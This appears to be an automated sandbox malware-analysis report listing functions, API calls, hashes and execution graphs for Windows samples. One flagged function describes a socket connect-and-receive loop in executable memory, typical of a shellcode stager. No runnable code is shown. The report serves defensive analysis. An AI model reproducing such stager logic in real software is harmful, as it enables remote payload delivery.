                                                              • String ID:
                                                              • API String ID: 3901518246-0
                                                              • Opcode ID: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction ID: 7f7b652e9f7b58be947c1c734e7a82da3d99598ff0fb71c13e03353473737a2d
                                                              • Opcode Fuzzy Hash: bb233ee99204156f9138ca45554c95eaa539cc3d4f2a2cc436c5bedac0f56ea0
                                                              • Instruction Fuzzy Hash: 063142B2211B409BE702DF13EA807A937A4F78CBD0F448429EB4847B65DF79E4A6C740
                                                              Function 00000001400112A8 Relevance: 5.1, APIs: 4, Instructions: 53memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: AllocCriticalHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 830345296-0
                                                              • Opcode ID: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction ID: 37e1212d5150fef44f5374ae18cee5b2af0a62904f946070966fd9e2c84ce28f
                                                              • Opcode Fuzzy Hash: 0174f44eaa2d8e27a3169ce146a30e111c1709516ab2c2556cb9a7121bcdce25
                                                              • Instruction Fuzzy Hash: 7B210872615B4482EB198F66E5403EC6361F78CFD4F548612EB6E4B7AACF38C552C350
                                                              Function 0000000140017120 Relevance: 5.0, APIs: 4, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: ByteCharMultiWidemalloc
                                                              • String ID:
                                                              • API String ID: 2735977093-0
                                                              • Opcode ID: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction ID: 61c3440d716b3c64d08436ee48054615140ae5ecb8d8084460387f48d4e9dd56
                                                              • Opcode Fuzzy Hash: 340bc02c17e4a8e241ea194c94348a7795e75439271f92f6ed283f878bcb1d35
                                                              • Instruction Fuzzy Hash: BB11C13260878082EB25CF26B41076AB7A4FB89BE4F140328EF9D57BE5DF39C0118704
                                                              Function 0000000140011668 Relevance: 5.0, APIs: 4, Instructions: 39memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: CriticalFreeHeapSection$EnterLeave
                                                              • String ID:
                                                              • API String ID: 1298188129-0
                                                              • Opcode ID: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction ID: 5186432533761a1e63310800083548d259c5d54e134ea9fda60ce401f62d664d
                                                              • Opcode Fuzzy Hash: 5595f30b4037b9aa6adac2c161615a39573475ea320742baef4c0fe7d259a659
                                                              • Instruction Fuzzy Hash: 76114C76600B4082EB5A9F53E5943E823A0FB9CBC5F4C8416EB091B6A7DF3AC4A5C300
                                                              Function 000000014000CE30 Relevance: 5.0, APIs: 4, Instructions: 37memoryCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1738633150.0000000140001000.00000020.00000001.01000000.00000003.sdmp, Offset: 0000000140000000, based on PE: true
                                                              • Associated: 00000000.00000002.1738615542.0000000140000000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738657685.0000000140018000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738674814.000000014001F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000000.00000002.1738690516.0000000140022000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_140000000_WO.jbxd
                                                              Similarity
                                                              • API ID: FreeHeap$CriticalSection$EnterLeavememset
                                                              • String ID:
                                                              • API String ID: 4254243056-0
                                                              • Opcode ID: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction ID: bd40ed23f28c7418c8be6727045953eb2e8c2f29468db0d1e18b21a18f306043
                                                              • Opcode Fuzzy Hash: 2bfe007ce864aac335da932a328f28b9e5c2ec482aeaf7599142f2e4e3f2ebe6
                                                              • Instruction Fuzzy Hash: FD01C8B5600B8492EB06EB63E9903E923A1FBCDBD0F488416AF0D1B776CF39D4518740

                                                              Execution Graph

                                                              Execution Coverage:0.9%
                                                              Dynamic/Decrypted Code Coverage:14.7%
                                                              Signature Coverage:11.8%
                                                              Total number of Nodes:68
                                                              Total number of Limit Nodes:3
                                                              execution_graph 1762 40a940 1763 40a959 LoadLibraryA 1762->1763 1764 40a96d 1762->1764 1763->1764 1765 40b540 1767 40b519 1765->1767 1766 40b557 1767->1765 1767->1766 1768 40b4f9 _onexit 1767->1768 1768->1767 1732 40384c 1733 403857 VirtualAlloc 1732->1733 1734 4038bf 1732->1734 1751 40a2ce 1752 40a2dd __p___initenv 1751->1752 1754 40a2fd 1752->1754 1735 401c50 1736 401db4 1735->1736 1737 401dc8 1736->1737 1738 401dfd select 1736->1738 1739 401e21 1738->1739 1780 401dd0 1781 401dd5 select 1780->1781 1783 401e21 1781->1783 1741 402015 printf 1742 402026 1741->1742 1728 40385b VirtualAlloc 1743 40121c atoi 1791 40479c 1792 4047d1 malloc 1791->1792 1793 4047a3 1791->1793 1794 4047f9 1792->1794 1793->1792 1793->1794 1740 409c60 LocalFree 1744 401020 1745 401054 1744->1745 1746 40109a atoi 1745->1746 1747 401534 1745->1747 1746->1747 1769 403522 1770 403525 1769->1770 1773 4037eb 1770->1773 1774 403800 VirtualAlloc 1773->1774 1795 4025a5 1796 403525 1795->1796 1797 4037eb VirtualAlloc 1796->1797 1798 40353b 1797->1798 1776 403528 1777 403530 1776->1777 1779 40353b 1776->1779 1778 4037eb VirtualAlloc 1777->1778 1777->1779 1778->1779 1717 690000 1720 690095 1717->1720 1719 690006 1719->1719 1721 6900aa 1720->1721 1722 6900bc WSASocketA 1721->1722 1723 6900d8 connect 1722->1723 1724 6900f1 recv 1723->1724 1726 6900e7 1723->1726 1725 690139 closesocket 1724->1725 1724->1726 1725->1722 1725->1726 1726->1723 1726->1724 1726->1725 1727 690157 1726->1727 1727->1719 1748 40a430 InitializeCriticalSection 1749 40a45f 1748->1749 1803 408db0 1804 408dd1 1803->1804 1805 408e1e 1804->1805 1806 408e02 #21 1804->1806 1806->1805 1759 4066f2 WSAGetLastError 1760 406730 1759->1760 1761 406707 WSAGetLastError 1759->1761 1784 4037f3 1785 4037ff VirtualAlloc 1784->1785 1750 405e36 SetLastError

                                                              Executed Functions

                                                              Function 00690095 Relevance: 6.1, APIs: 4, Instructions: 81networkCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 0 690095-6900ba 3 6900bc-6900d7 WSASocketA 0->3 4 6900d8-6900e5 connect 3->4 5 6900f1-690101 recv 4->5 6 6900e7-6900ea 4->6 8 690139-690146 closesocket 5->8 9 690103-690117 5->9 6->4 7 6900ec call 690158 6->7 7->5 8->3 10 69014c 8->10 13 690118-690127 9->13 10->7 15 690129-690132 13->15 16 690151-690155 13->16 15->8 16->13 17 690157 16->17
                                                              APIs
                                                              • WSASocketA.WS2_32(E0DF0FEA,00000002,00000001,00000000,00000000,00000000,00000000,61040002,17DDB993,0000000A,?,?,5F327377,00003233), ref: 006900D5
                                                              • connect.WS2_32(6174A599,?,?,00000010,?,?,5F327377,00003233), ref: 006900E1
                                                              • recv.WS2_32(5FC8D902,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 006900FC
                                                              • closesocket.WS2_32(614D6E75,?,?,?,00000004,00000000,?,?,00000010,?,?,5F327377,00003233), ref: 0069013F
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895821708.0000000000690000.00000040.00001000.00020000.00000000.sdmp, Offset: 00690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_690000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Socketclosesocketconnectrecv
                                                              • String ID:
                                                              • API String ID: 2083937939-0
                                                              • Opcode ID: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction ID: 327eec653f23560a16df2192c97ad8ff14f98007befe078a999dd95378402dd5
                                                              • Opcode Fuzzy Hash: 84d56f8600d23d128e6293084ea8b9ff6e5c57e2ecd32b084406f59f59bbaeb3
                                                              • Instruction Fuzzy Hash: A711C0B168029C3EF93022A29C47FBB291CCF42BA4F100025BB45FA5C1C8829C4481FA
                                                              Function 00403840 Relevance: 1.3, APIs: 1, Instructions: 26COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 18 403840-403841 19 403843-403856 18->19 20 4037f8-4037fc 18->20 25 403857-40385e VirtualAlloc 19->25 21 40381a-40382f 20->21 22 4037fe 20->22 21->19 24 403800-403819 22->24 22->25 24->21
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 3ceb6121e470dd3cfc2d7d2917fae457fcaf0d6d10cf17591cb545ae1a2ff9fe
                                                              • Instruction ID: c05b59b9f4d16bb34214b641b6d9fa06ca1f9ade271ab6cde73b9576214de40b
                                                              • Opcode Fuzzy Hash: 3ceb6121e470dd3cfc2d7d2917fae457fcaf0d6d10cf17591cb545ae1a2ff9fe
                                                              • Instruction Fuzzy Hash: 4DD0C2672CA205B9E120BC404C86BF60ECC570DB52F24D4B2B30B761C3C2BC0B4220DE
                                                              Function 0040384C Relevance: 1.3, APIs: 1, Instructions: 15memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 28 40384c-403855 29 403857-40385e VirtualAlloc 28->29 30 4038bf-4038c1 28->30
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(E553A458,00000000,00000162,00001000,00000040), ref: 0040385C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: db0306e660f09edcc4f5f164cefd3230d4254f124b2ae6d508b866a97e50a146
                                                              • Instruction ID: 4c74da6d6e42419762f900211d688d1802f97791c277bf9d3c462be40ba0076a
                                                              • Opcode Fuzzy Hash: db0306e660f09edcc4f5f164cefd3230d4254f124b2ae6d508b866a97e50a146
                                                              • Instruction Fuzzy Hash: 84C080E56606265FD113E8541CD15D57FDF4A0572234444BFE50187481C65545C3958E
                                                              Function 0040385B Relevance: 1.3, APIs: 1, Instructions: 3memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 31 40385b-40385e VirtualAlloc
                                                              APIs
                                                              • VirtualAlloc.KERNELBASE(E553A458,00000000,00000162,00001000,00000040), ref: 0040385C
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocVirtual
                                                              • String ID:
                                                              • API String ID: 4275171209-0
                                                              • Opcode ID: ba2b6113f8c1361e142327349295ae9b9a32fc9305af006692fd18a4717b3ee3
                                                              • Instruction ID: aa9c93fac3d8d666de76663d130f4f6789e6514029e2e882532ee80fad553c2d
                                                              • Opcode Fuzzy Hash: ba2b6113f8c1361e142327349295ae9b9a32fc9305af006692fd18a4717b3ee3
                                                              • Instruction Fuzzy Hash:

                                                              Non-executed Functions

                                                              Function 00404823 Relevance: .0, Instructions: 46COMMON
                                                              Download Yara Rule
                                                              Memory Dump Source
                                                              • Source File: 00000006.00000002.2895574683.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000006.00000002.2895553880.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895609780.000000000040C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895642075.000000000040D000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                              • Associated: 00000006.00000002.2895673835.0000000000415000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_6_2_400000_reddit.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 28fd3fa50fbd8cf2bb7474e30977f42a20ef7becb69c517353e431a02ed97b9e
                                                              • Instruction ID: 499dceeee35c5cbcfd260d2c75f29c8aca30d98019ce3b9202ad5b964b78262f
                                                              • Opcode Fuzzy Hash: 28fd3fa50fbd8cf2bb7474e30977f42a20ef7becb69c517353e431a02ed97b9e
                                                              • Instruction Fuzzy Hash: 19017B31A8C2961BD3018A645806D85BFA49B83230F0843BACC91EB3E3C355D45AC3CA

                                                              Execution Graph

                                                              Execution Coverage:14.4%
                                                              Dynamic/Decrypted Code Coverage:0%
                                                              Signature Coverage:0%
                                                              Total number of Nodes:814
                                                              Total number of Limit Nodes:20
                                                              execution_graph 7543 140001dea 7544 140001ded 7543->7544 7555 140012360 7544->7555 7547 140012360 HeapFree 7548 140001e11 7547->7548 7549 140012360 HeapFree 7548->7549 7550 140001e23 7549->7550 7551 140012360 HeapFree 7550->7551 7552 140001e35 7551->7552 7553 140012360 HeapFree 7552->7553 7554 140001e47 7553->7554 7556 140012371 HeapFree 7555->7556 7557 140001dfc 7555->7557 7556->7557 7557->7547 8328 140011f69 8329 14001202d 8328->8329 8330 140011f89 8328->8330 8330->8329 8331 140011fc4 8330->8331 8334 140011d30 4 API calls 8330->8334 8332 140011feb 8331->8332 8333 140011fcf memmove 8331->8333 8332->8329 8335 140011ffb 8332->8335 8336 14001202f memmove 8332->8336 8333->8332 8334->8331 8335->8329 8337 140016538 5 API calls 8335->8337 8336->8329 8337->8335 7558 1400141eb 7559 1400141f6 7558->7559 7561 14001430c 7559->7561 7562 140014d80 7559->7562 7563 140014dad 7562->7563 7564 140014e0a memmove 7563->7564 7565 140014def memmove 7563->7565 7566 140014dc7 7563->7566 7564->7566 7567 140014e2b memmove 7564->7567 7565->7566 7566->7561 7567->7566 8189 1400016ed 8190 1400016f0 8189->8190 8191 140012360 HeapFree 8190->8191 8192 1400016ff 8191->8192 8193 140011ef4 2 API calls 8192->8193 8194 140001711 8193->8194 8195 140011ef4 2 API calls 8194->8195 8196 140001723 8195->8196 7889 140003c6e 7890 140003c71 7889->7890 7891 140012360 HeapFree 7890->7891 7892 140003c80 7891->7892 7893 140012360 HeapFree 7892->7893 7894 140003c92 7893->7894 7895 140012360 HeapFree 7894->7895 7896 140003ca7 7895->7896 7897 140012360 HeapFree 7896->7897 7898 140003cb9 7897->7898 7899 140017070 7900 1400170f8 7899->7900 7901 140017097 MultiByteToWideChar 7899->7901 7902 1400126d0 2 API calls 7900->7902 7901->7900 7904 1400170c9 7901->7904 7905 140017101 7902->7905 7906 1400126d0 2 API calls 7904->7906 7907 1400170d2 MultiByteToWideChar 7906->7907 7907->7905 7908 140012c70 TlsGetValue HeapFree HeapFree 7909 140010c70 7912 140010c98 7909->7912 7913 140010cd1 7912->7913 7914 140010ceb 7912->7914 7917 140010cd9 7912->7917 7918 1400171f0 7913->7918 7914->7917 7925 140016e50 7914->7925 7931 140010f00 7917->7931 7919 140017216 WideCharToMultiByte 7918->7919 7920 14001729d malloc 7918->7920 7919->7920 7923 14001725a malloc 7919->7923 7921 1400172aa 7920->7921 7921->7917 7923->7920 7924 14001726d WideCharToMultiByte 7923->7924 7924->7921 7926 140016e76 WideCharToMultiByte 7925->7926 7929 140016f02 7925->7929 7928 140016ebe malloc 7926->7928 7926->7929 7928->7929 7930 140016ecf WideCharToMultiByte 7928->7930 7929->7917 7930->7929 7932 140010f1e 7931->7932 7933 1400126d0 2 API calls 7932->7933 7934 140010d5b 7933->7934 8197 140014af0 8199 140014b26 8197->8199 8200 140014b12 8197->8200 8198 140014d80 3 API calls 8198->8199 8200->8198 8200->8199 7397 14000e3f0 7398 14000e4ee 7397->7398 7399 14000e40a 7397->7399 7399->7398 7400 14000e483 7399->7400 7401 14000e41a 7399->7401 7414 14000e770 WideCharToMultiByte 7400->7414 7403 14000e451 7401->7403 7404 14000e425 7401->7404 7403->7403 7405 14000e45d WriteFile 7403->7405 7409 14000e620 5 API calls 7404->7409 7407 14000e4c5 WriteFile 7411 14000e4dc HeapFree 7407->7411 7408 14000e4b7 7418 14000e620 7408->7418 7412 14000e445 7409->7412 7411->7398 7413 14000e4bf 7413->7411 7415 14000e7b9 HeapAlloc 7414->7415 7416 14000e4a0 7414->7416 7415->7416 7417 14000e7d8 WideCharToMultiByte 7415->7417 7416->7398 7416->7407 7416->7408 7417->7416 7419 14000e644 7418->7419 7420 14000e75e 7418->7420 7421 14000e673 7419->7421 7422 14000e64a SetFilePointer 7419->7422 7420->7413 7423 14000e67e 7421->7423 7424 14000e6ff 7421->7424 7422->7421 7425 14000e6b7 7423->7425 7428 14000e699 memmove 7423->7428 7431 14000ddc0 7424->7431 7425->7413 7427 14000e707 7429 14000e711 WriteFile 7427->7429 7430 14000e739 memmove 7427->7430 7428->7413 7429->7413 7430->7413 7432 14000de04 7431->7432 7433 14000ddd4 WriteFile 7431->7433 7432->7427 7433->7427 7568 14000e1f0 7569 1400112a8 5 API calls 7568->7569 7570 14000e21b 7569->7570 7571 14000e227 CreateFileW 7570->7571 7572 14000e27f 7570->7572 7571->7572 7573 14000e25c 7571->7573 7573->7572 7574 14000e267 HeapAlloc 7573->7574 7574->7572 7579 1400113f8 EnterCriticalSection 7580 140011423 LeaveCriticalSection 7579->7580 7935 140016c77 7936 140016c89 TlsFree 7935->7936 7937 140016cbf 7935->7937 7939 140016c97 7936->7939 7938 140016cab DeleteCriticalSection 7938->7937 7939->7938 8201 14000d8f8 8202 14000d908 8201->8202 8203 14000d90d 8201->8203 8205 140011a50 8202->8205 8206 140011a81 8205->8206 8207 140011a60 8205->8207 8206->8203 8211 140011c48 EnterCriticalSection 8207->8211 8209 140011a65 8209->8206 8212 140011bdc 8209->8212 8211->8209 8213 140011be7 8212->8213 8214 140011c3c 8213->8214 8215 140011c32 LeaveCriticalSection 8213->8215 8214->8209 8215->8214 7393 140010ffc 7394 140011009 7393->7394 7395 14001101f 7393->7395 7394->7395 7396 140011013 TlsFree 7394->7396 7396->7395 8338 140010b7c 8339 140010b85 memset 8338->8339 8340 140010b8d 8338->8340 8339->8340 8341 14000477e 8342 140012360 HeapFree 8341->8342 8343 140004790 8342->8343 8344 140012360 HeapFree 8343->8344 8345 1400047a2 8344->8345 8346 140012360 HeapFree 8345->8346 8347 1400047b4 8346->8347 8348 140012360 HeapFree 8347->8348 8349 1400047c6 8348->8349 8350 140012360 HeapFree 8349->8350 8351 1400047d8 8350->8351 7434 140001000 7435 14000101d 7434->7435 7486 140012060 HeapCreate TlsAlloc 7435->7486 7437 14000105b 7489 14000de20 7437->7489 7439 140001065 7492 14000c980 HeapCreate 7439->7492 7441 140001074 7493 14000c07c 7441->7493 7443 140001079 7444 14000b538 memset InitCommonControlsEx CoInitialize 7443->7444 7445 14000107e 7444->7445 7446 140007160 InitializeCriticalSection 7445->7446 7447 140001083 7446->7447 7448 1400120d0 HeapAlloc HeapReAlloc HeapFree 7447->7448 7449 1400010a3 7448->7449 7450 14000ccd8 32 API calls 7449->7450 7451 1400010e6 7450->7451 7452 14000d524 16 API calls 7451->7452 7453 1400010fa 7452->7453 7454 14000d444 11 API calls 7453->7454 7455 14000111e 7454->7455 7456 14000d524 16 API calls 7455->7456 7457 14000112a 7456->7457 7458 14000d444 11 API calls 7457->7458 7459 14000114e 7458->7459 7460 140011d30 HeapAlloc memset HeapFree HeapFree 7459->7460 7461 140001185 7460->7461 7462 1400120d0 HeapAlloc HeapReAlloc HeapFree 7461->7462 7463 1400011a6 7462->7463 7464 14000d524 16 API calls 7463->7464 7465 1400011b2 7464->7465 7466 14000d444 11 API calls 7465->7466 7467 1400011d6 7466->7467 7468 14000c4d0 RemoveVectoredExceptionHandler AddVectoredExceptionHandler 7467->7468 7469 1400011e5 7468->7469 7470 1400121c0 GetLastError TlsGetValue SetLastError 7469->7470 7471 1400011ef 7470->7471 7472 1400121c0 GetLastError TlsGetValue SetLastError 7471->7472 7473 1400011ff 7472->7473 7474 140004211 31 API calls 7473->7474 7475 14000120e 7474->7475 7476 140012210 TlsGetValue HeapAlloc HeapReAlloc 7475->7476 7477 14000121f 7476->7477 7478 1400021ea 50 API calls 7477->7478 7479 140001224 7478->7479 7480 140001236 7479->7480 7481 14000433f 188 API calls 7479->7481 7482 14000593c 232 API calls 7480->7482 7481->7480 7483 14000123b 7482->7483 7484 1400120a0 HeapDestroy TlsFree 7483->7484 7485 140001245 HeapDestroy ExitProcess 7484->7485 7498 140012bf0 HeapAlloc HeapAlloc TlsSetValue 7486->7498 7488 14001208c 7488->7437 7499 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7489->7499 7491 14000de38 7491->7439 7492->7441 7500 1400110dc 7493->7500 7497 14000c0a8 InitializeCriticalSection 7498->7488 7499->7491 7501 1400110fd 7500->7501 7502 140011112 TlsAlloc HeapAlloc TlsSetValue 7501->7502 7503 140011149 TlsGetValue HeapReAlloc TlsSetValue 7501->7503 7502->7503 7504 140011198 7503->7504 7505 14000c08d 7504->7505 7508 140011cb0 HeapAlloc 7504->7508 7507 140011370 HeapAlloc HeapAlloc InitializeCriticalSection 7505->7507 7507->7497 7509 140011cd3 7508->7509 7509->7505 7582 140007a00 7585 140007a50 7582->7585 7586 140007a79 7585->7586 7607 140012630 TlsGetValue 7586->7607 7589 140012630 TlsGetValue 7590 140007a9c 7589->7590 7609 1400126d0 TlsGetValue 7590->7609 7593 140007abf 7599 140007acf 7593->7599 7614 1400127f0 TlsGetValue 7593->7614 7596 140007c35 7615 1400128a0 TlsGetValue 7596->7615 7598 140007a1c 7599->7596 7599->7599 7600 140007b20 HeapAlloc 7599->7600 7601 140007b50 7599->7601 7600->7601 7601->7601 7602 140007b91 wcsncpy 7601->7602 7605 140007bac 7601->7605 7602->7605 7603 140007c02 7603->7596 7604 140007c09 HeapFree 7603->7604 7604->7596 7605->7603 7606 140007bdf wcsncpy 7605->7606 7606->7603 7608 140007a92 7607->7608 7608->7589 7610 1400126f4 7609->7610 7611 14001272d HeapReAlloc 7610->7611 7612 140007ab1 7610->7612 7611->7612 7612->7593 7613 1400127f0 TlsGetValue 7612->7613 7613->7593 7614->7599 7615->7598 7616 140008200 7619 140008260 7616->7619 7620 1400082e4 7619->7620 7621 140008397 7620->7621 7632 14000830a 7620->7632 7623 140012630 TlsGetValue 7621->7623 7622 140008221 7624 14000839f 7623->7624 7625 1400083ba 7624->7625 7626 1400083aa _wcsdup 7624->7626 7627 140012630 TlsGetValue 7625->7627 7626->7625 7628 1400083c2 7627->7628 7629 1400083d8 7628->7629 7630 1400083cd _wcsdup 7628->7630 7631 140012630 TlsGetValue 7629->7631 7630->7629 7633 1400083e0 7631->7633 7632->7622 7634 140008363 wcsncpy 7632->7634 7635 1400083eb _wcsdup 7633->7635 7636 1400083f8 7633->7636 7634->7632 7635->7636 7636->7636 7637 1400126d0 2 API calls 7636->7637 7638 140008481 7637->7638 7639 1400084ed wcsncpy 7638->7639 7640 140008488 7638->7640 7641 14000850e 7638->7641 7639->7641 7642 140008575 7640->7642 7643 14000856d free 7640->7643 7641->7640 7647 1400085c0 wcsncpy 7641->7647 7644 140008587 7642->7644 7645 14000857f free 7642->7645 7643->7642 7644->7622 7646 140008591 free 7644->7646 7645->7644 7646->7622 7647->7641 7946 14000d881 7947 14000d89d 7946->7947 7948 14000d8dc 7946->7948 7947->7948 7951 14000d8af 7947->7951 7953 14000d60c 7947->7953 7951->7948 7960 14000d6a0 7951->7960 7965 140016538 7951->7965 7954 14000d656 7953->7954 7955 14000d62f 7953->7955 7956 14000d654 7954->7956 7957 1400116f4 3 API calls 7954->7957 7955->7956 7958 1400168c0 HeapFree 7955->7958 7974 1400116f4 7955->7974 7956->7951 7957->7954 7958->7955 7961 14001147c 4 API calls 7960->7961 7962 14000d6b6 7961->7962 7963 14000d6c2 memset 7962->7963 7964 14000d6d6 7962->7964 7963->7964 7964->7951 7966 1400168b7 7965->7966 7971 140016541 7965->7971 7966->7951 7967 1400168b2 memmove 7967->7966 7968 140016860 memmove 7968->7971 7969 140016895 7969->7966 7969->7967 7970 140016538 wcslen HeapAlloc HeapFree 7970->7971 7971->7968 7971->7969 7971->7970 7972 140012360 HeapFree 7971->7972 7981 1400122f0 7971->7981 7972->7971 7975 14001170a EnterCriticalSection 7974->7975 7976 140011714 7974->7976 7975->7976 7979 14001177b HeapFree 7976->7979 7980 140011794 7976->7980 7977 1400117f1 7977->7955 7978 1400117e7 LeaveCriticalSection 7978->7977 7979->7980 7980->7977 7980->7978 7982 140012351 7981->7982 7983 140012306 wcslen HeapAlloc 7981->7983 7982->7971 7985 140012820 7983->7985 7986 140012845 7985->7986 7986->7982 8224 140013507 8225 14001350c 8224->8225 8226 140014d80 3 API calls 8225->8226 8227 1400134ee 8225->8227 8226->8227 7648 140011e0c 7650 140011e56 7648->7650 7651 140011ec4 7650->7651 7652 140011d30 7650->7652 7658 140011ef4 7652->7658 7655 140011d6e HeapAlloc 7656 140011d90 memset 7655->7656 7657 140011dc6 7655->7657 7656->7657 7657->7651 7659 140011d69 7658->7659 7662 140011ef9 7658->7662 7659->7655 7659->7657 7660 140011f38 HeapFree 7660->7659 7662->7660 7663 1400168c0 7662->7663 7665 1400168da 7663->7665 7664 1400169fd 